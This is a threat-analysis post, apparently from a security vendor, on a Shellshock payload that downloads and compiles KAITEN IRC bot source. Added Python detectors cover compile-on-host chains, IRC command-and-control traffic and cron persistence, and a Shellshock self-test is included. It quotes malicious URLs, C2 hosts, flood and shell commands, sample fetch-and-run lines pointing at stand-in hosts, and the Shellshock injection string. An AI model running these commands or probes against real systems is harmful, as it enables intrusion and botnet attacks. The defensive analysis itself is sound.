We found that one of the payloads delivered through the Bash vulnerability (Shellshock), which we detect as TROJ_BASHKAI.SM, downloads the source code of the KAITEN malware, an IRC-controlled bot used to carry out denial-of-service attacks. Based on our analysis, when TROJ_BASHKAI.SM is executed, it connects to the following malicious URLs:

http://www[dot]computer-services[dot]name/b[dot]c

http://stablehost[dot]us/bots/regular[dot]bot

When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the KAITEN source code and compiles it with gcc, the C compiler present on most Linux systems. In other words, the payload does not fetch a ready-made executable from this URL; it fetches a source file (b.c) and builds the executable on the infected host. The resulting binary is detected as ELF_KAITEN.SM.

Downloading and compiling on the infected system can be seen as a precautionary measure. An ELF binary downloaded directly may have compatibility issues (architecture, library versions) across Linux distributions. Compiling on the victim ensures that the malware is built against whatever is present and executes properly.

This routine can also be viewed as an evasion technique. Some network security systems, for performance reasons, skip scanning of non-executable files; a C source file is plain text and may therefore pass without inspection. In addition, recompiling the source on each victim produces a different binary, and therefore a different hash, for each platform, compiler version and distribution, which makes hash-based detection of the compiled binaries unreliable.
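The download-then-compile chain is easy to hunt for in process telemetry: a shell descended from the web server that fetches a URL and then invokes a compiler. The following is an added example, not code from the original post or from Trend Micro. It assumes a simplified execution-event format (ts, pid, ppid, comm, argv, cwd) standing in for whatever auditd or EDR feed is available; the sample events and the host downloader.example are constructed for the demonstration.

```python
import re

# Process names treated as web servers, fetch tools and compilers.
# These sets are assumptions for the demo; extend them for your fleet.
WEB_SERVERS = {"httpd", "apache2", "nginx", "lighttpd"}
DOWNLOADERS = {"wget", "curl", "fetch"}
COMPILERS = {"gcc", "cc", "clang", "tcc"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
URL_RE = re.compile(r"^https?://")


def _descends_from_web_server(ev, by_pid):
    """Walk ev's parent chain; True if any ancestor is a web server."""
    seen = set()
    cur = ev
    while cur is not None and cur["pid"] not in seen:
        if cur["comm"] in WEB_SERVERS:
            return True
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return False


def find_compile_on_host(events):
    """Flag a web-server-descended session (keyed by the parent shell's
    pid) that fetches a URL and later runs a compiler, or that compiles
    anything living in a temp directory even without a seen download."""
    by_pid = {e["pid"]: e for e in events}
    fetched = {}   # parent pid -> URLs fetched by children of that shell
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if not _descends_from_web_server(ev, by_pid):
            continue
        session = ev["ppid"]
        if ev["comm"] in DOWNLOADERS:
            urls = [a for a in ev["argv"] if URL_RE.match(a)]
            fetched.setdefault(session, []).extend(urls)
        elif ev["comm"] in COMPILERS:
            in_tmp = any(a.startswith(TEMP_DIRS) for a in ev["argv"])
            if fetched.get(session) or in_tmp:
                alerts.append({
                    "session": session,
                    "urls": list(fetched.get(session, [])),
                    "sources": [a for a in ev["argv"] if a.endswith(".c")],
                    "compiler": " ".join(ev["argv"]),
                })
    return alerts


# Constructed sample telemetry: a CGI request spawns bash under httpd,
# which fetches b.c and compiles it; an admin over SSH compiles normally.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 100, "ppid": 1, "comm": "httpd",
     "argv": ["/usr/sbin/httpd"], "cwd": "/"},
    {"ts": 2, "pid": 2001, "ppid": 100, "comm": "bash",
     "argv": ["/bin/bash", "-c", "cd /tmp; wget -q http://downloader.example/b.c; gcc -o b b.c; ./b"],
     "cwd": "/var/www/cgi-bin"},
    {"ts": 3, "pid": 2002, "ppid": 2001, "comm": "wget",
     "argv": ["wget", "-q", "http://downloader.example/b.c", "-O", "/tmp/b.c"], "cwd": "/tmp"},
    {"ts": 4, "pid": 2003, "ppid": 2001, "comm": "gcc",
     "argv": ["gcc", "-o", "/tmp/b", "/tmp/b.c"], "cwd": "/tmp"},
    {"ts": 5, "pid": 300, "ppid": 1, "comm": "sshd",
     "argv": ["/usr/sbin/sshd"], "cwd": "/"},
    {"ts": 6, "pid": 3001, "ppid": 300, "comm": "bash",
     "argv": ["-bash"], "cwd": "/home/dev"},
    {"ts": 7, "pid": 3002, "ppid": 3001, "comm": "gcc",
     "argv": ["gcc", "-o", "hello", "hello.c"], "cwd": "/home/dev"},
]

if __name__ == "__main__":
    for alert in find_compile_on_host(SAMPLE_EVENTS):
        print(alert)
```

The ancestry walk is what keeps the developer's compile under sshd quiet while the same gcc invocation under httpd is flagged; on a real feed, replace SAMPLE_EVENTS with events built from your audit records and widen the compiler set to whatever toolchains the host actually carries.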

ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net, joins the channel #pwn and waits for commands. Among the commands the attackers issued are:

Perform UDP flood

Perform SYN flood

Download files

Send raw IRC command

Start remote shell

Perform PUSH-ACK flood

Disable, enable, terminate client
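For the IRC side, a detection over captured traffic or proxy logs can key on the server, the channel names and the command vocabulary. The following is an added example, not code from the original post or from KAITEN itself. The server and channel names are taken from this post; the command keywords (UDP, SYN, PAN, GET, IRC, SH, DISABLE, ENABLE, KILL) and the "keyword target port seconds" argument layout are illustrative assumptions chosen to mirror the capability list above, and the session lines are constructed.

```python
import re

# Indicators named in the post.
C2_HOSTS = {"x.secureshellz.net", "linksys.secureshellz.net"}
C2_CHANNELS = {"#pwn", "#shellshock", "#scan"}

# Command keywords are an assumption mirroring the capability list above;
# take the real vocabulary from the bot source you recovered.
DDOS_COMMANDS = {"UDP": "UDP flood", "SYN": "SYN flood", "PAN": "PUSH-ACK flood"}
CONTROL_COMMANDS = {
    "GET": "download file", "IRC": "raw IRC command", "SH": "remote shell",
    "DISABLE": "disable client", "ENABLE": "enable client", "KILL": "terminate client",
}

IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$")


def parse_irc(line):
    """Split a raw IRC line into prefix, command, middle params, trailing."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    params = m.group("params") or ""
    trailing = None
    if params.startswith(":"):
        params, trailing = "", params[1:]
    elif " :" in params:
        params, trailing = params.split(" :", 1)
    return {"prefix": m.group("prefix"), "cmd": m.group("cmd").upper(),
            "params": params.split(), "trailing": trailing}


def triage_irc_session(dst_host, lines):
    """Return findings for one IRC session; lines are (direction, raw)
    with direction 'C' for client->server and 'S' for server->client."""
    findings = []
    if dst_host.lower() in C2_HOSTS:
        findings.append({"type": "known_c2_host", "host": dst_host})
    for direction, raw in lines:
        msg = parse_irc(raw)
        if msg is None:
            continue
        if direction == "C" and msg["cmd"] == "JOIN":
            chans = list(msg["params"])
            if msg["trailing"]:
                chans.append(msg["trailing"])
            for ch in chans:
                if ch.lower() in C2_CHANNELS:
                    findings.append({"type": "join_c2_channel", "channel": ch})
        elif direction == "S" and msg["cmd"] == "PRIVMSG" and msg["trailing"]:
            tokens = msg["trailing"].split()
            keyword = tokens[0].upper()
            if keyword in DDOS_COMMANDS:
                findings.append({"type": "ddos_command",
                                 "name": DDOS_COMMANDS[keyword], "args": tokens[1:]})
            elif keyword in CONTROL_COMMANDS:
                findings.append({"type": "control_command",
                                 "name": CONTROL_COMMANDS[keyword], "args": tokens[1:]})
    return findings


# Constructed session: the bot joins #pwn and the operator issues a UDP
# flood and a shell command; ordinary chatter and PING/PONG are ignored.
SAMPLE_SESSION = [
    ("C", "NICK bot5521"),
    ("C", "USER bot 8 * :bot"),
    ("S", ":x.secureshellz.net 001 bot5521 :Welcome"),
    ("C", "JOIN #pwn"),
    ("S", ":op!op@c2host PRIVMSG #pwn :UDP 203.0.113.5 53 30"),
    ("S", ":op!op@c2host PRIVMSG #pwn :hello everyone"),
    ("S", ":op!op@c2host PRIVMSG #pwn :SH uname -a"),
    ("S", "PING :x.secureshellz.net"),
    ("C", "PONG :x.secureshellz.net"),
]

if __name__ == "__main__":
    for finding in triage_irc_session("x.secureshellz.net", SAMPLE_SESSION):
        print(finding)
```

Only server-to-client PRIVMSGs are treated as commands, since on a bot channel the operator talks and the bots listen; the host and channel checks fire independently of the vocabulary, so a rebuilt bot with renamed commands still trips on the infrastructure indicators.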

When it connects to http://stablehost[dot]us/bots/regular[dot]bot, it downloads three separate files. The first is another copy of the KAITEN source code, which is likewise compiled, this time into ELF_KAITEN.A. This behaves like ELF_KAITEN.SM except that it connects to linksys[dot]secureshellz[dot]net on port 25 and joins the channel #shellshock.

The second file is Mac OS X malware detected as OSX_KAITEN.A, which behaves like ELF_KAITEN.A. The third is a shellbot detected as PERL_SHELLBOT.SMO, a capable IRC-controlled Perl bot that connects to the same server as the previous two files but to a different channel (#scan). Unlike KAITEN, which does not scan for vulnerable servers, PERL_SHELLBOT.SMO searches for vulnerable websites through various search engines.

Aside from downloading KAITEN and the shellbot, regular.bot (detected as TROJ_BASHKAI.SM) creates the file /tmp/c, which schedules a weekly download from the second URL. This keeps the payload up to date and also gives the attackers a recurring foothold on the host after the initial exploitation.
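If the weekly download is scheduled through cron, the same behaviour shows up in crontab output. The following is an added example, not code from the original post: it parses crontab-style lines, flags entries that fetch a remote URL with a download tool, and records whether each one runs weekly and whether it hands the fetched file to a shell. The sample entries and the hosts updater.example and repo.example are constructed.

```python
import re

URL_RE = re.compile(r"https?://\S+")
FETCHERS = ("wget", "curl", "fetch", "lwp-download")
# The fetched file handed to a shell, or made executable, in the same entry.
EXEC_RE = re.compile(r"(?:[;|&]\s*(?:ba)?sh\b|\bchmod\b)")


def parse_crontab_line(line):
    """Return {'schedule', 'command'} for one crontab entry, or None for
    comments, blanks and malformed lines. Handles @weekly-style shortcuts."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        special, _, cmd = line.partition(" ")
        return {"schedule": special, "command": cmd.strip()} if cmd.strip() else None
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return {"schedule": " ".join(parts[:5]), "command": parts[5]}


def is_weekly(schedule):
    """True for @weekly or a 5-field spec pinned to a weekday but not to a
    day of month (the crontab idiom for 'once a week')."""
    if schedule == "@weekly":
        return True
    f = schedule.split()
    return len(f) == 5 and f[2] == "*" and f[3] == "*" and f[4] != "*"


def find_remote_fetch_entries(crontab_text):
    """Flag entries whose command downloads from a URL with a fetch tool."""
    hits = []
    for line in crontab_text.splitlines():
        entry = parse_crontab_line(line)
        if entry is None:
            continue
        cmd = entry["command"]
        urls = URL_RE.findall(cmd)
        uses_fetcher = any(re.search(rf"\b{re.escape(f)}\b", cmd) for f in FETCHERS)
        if urls and uses_fetcher:
            hits.append({
                "schedule": entry["schedule"],
                "weekly": is_weekly(entry["schedule"]),
                "urls": urls,
                "executes": bool(EXEC_RE.search(cmd)),
                "command": cmd,
            })
    return hits


# Constructed crontab: a weekly fetch-and-run of regular.bot alongside
# two ordinary jobs, one of which legitimately downloads a file.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * 0 wget -q http://updater.example/bots/regular.bot -O /tmp/c; sh /tmp/c
*/5 * * * * /usr/bin/php /var/www/cron.php
@daily curl -fsS https://repo.example/index.json -o /var/cache/idx.json
"""

if __name__ == "__main__":
    for hit in find_remote_fetch_entries(SAMPLE_CRONTAB):
        print(hit)
```

Run it over the output of crontab -l for each user plus the files under /etc/cron.d; the "executes" flag separates a job that merely refreshes a data file from one that fetches and then runs something out of a temp directory, which is the pattern described above.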

Figure 1. Screenshot of BASHKAI source code

Implications

KAITEN is old IRC-controlled DDoS malware, so one possibility is that the attackers used Shellshock to revive its old activities, such as DDoS attacks against organizations. Another is that the attackers behind these Shellshock attacks want to extend their infection chain to include DDoS capability via KAITEN.

Typically, systems infected with Shellshock payloads become part of the attackers' botnet and can therefore be used to launch DDoS attacks. In addition, the appearance of a downloaded file that targets Mac OS X clearly shows that the attackers are broadening their target platforms.

It was earlier reported that the "vast majority" of Mac OS X users are "safe by default" from Shellshock. However, users who have enabled Advanced Unix Services are still affected. Advanced Unix Services enables remote access via Secure Shell (SSH), which gives system and network administrators convenient access for managing their servers. This service is most likely to be enabled on machines used as servers, such as web servers, which are the common targets of Shellshock attacks.
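Whether a given host, Mac or Linux, is exposed comes down to the bash binary itself; SSH and CGI only provide routes to it. The following is an added example, not code from the original post, that runs the classic probe for the first Shellshock bug (CVE-2014-6271): it exports a variable shaped like a function definition with code trailing the closing brace and checks whether bash executes that code on startup. The probe string is the well-known one; the helper name check_shellshock and its return values are this example's own.

```python
import subprocess

# Function-shaped value with extra code after the body; a vulnerable bash
# runs the trailing "echo" while importing the variable at startup.
PROBE = "() { :;}; echo VULNERABLE"


def check_shellshock(bash="bash"):
    """Return 'vulnerable' if bash executes the trailing code of an
    exported function-shaped variable on startup, 'patched' if it runs
    the child normally without doing so, 'no-bash' if no bash could be run."""
    env = {"PATH": "/usr/local/bin:/usr/bin:/bin", "x": PROBE}
    try:
        proc = subprocess.run([bash, "-c", "echo probe"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return "no-bash"
    if "VULNERABLE" in proc.stdout:
        return "vulnerable"
    return "patched" if "probe" in proc.stdout else "no-bash"


if __name__ == "__main__":
    print(check_shellshock())
```

A "patched" result covers only the original bug; the follow-up Shellshock CVEs (CVE-2014-7169 and later) need their own probes, and a host can still be reachable through a vulnerable CGI script or SSH ForceCommand even when its interactive bash has been updated, so check the binary that those services actually invoke.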

Trend Micro is continuously monitoring the threat landscape for any developments regarding Shellshock. For more information about threats exploiting Shellshock, you can refer to our summary post.
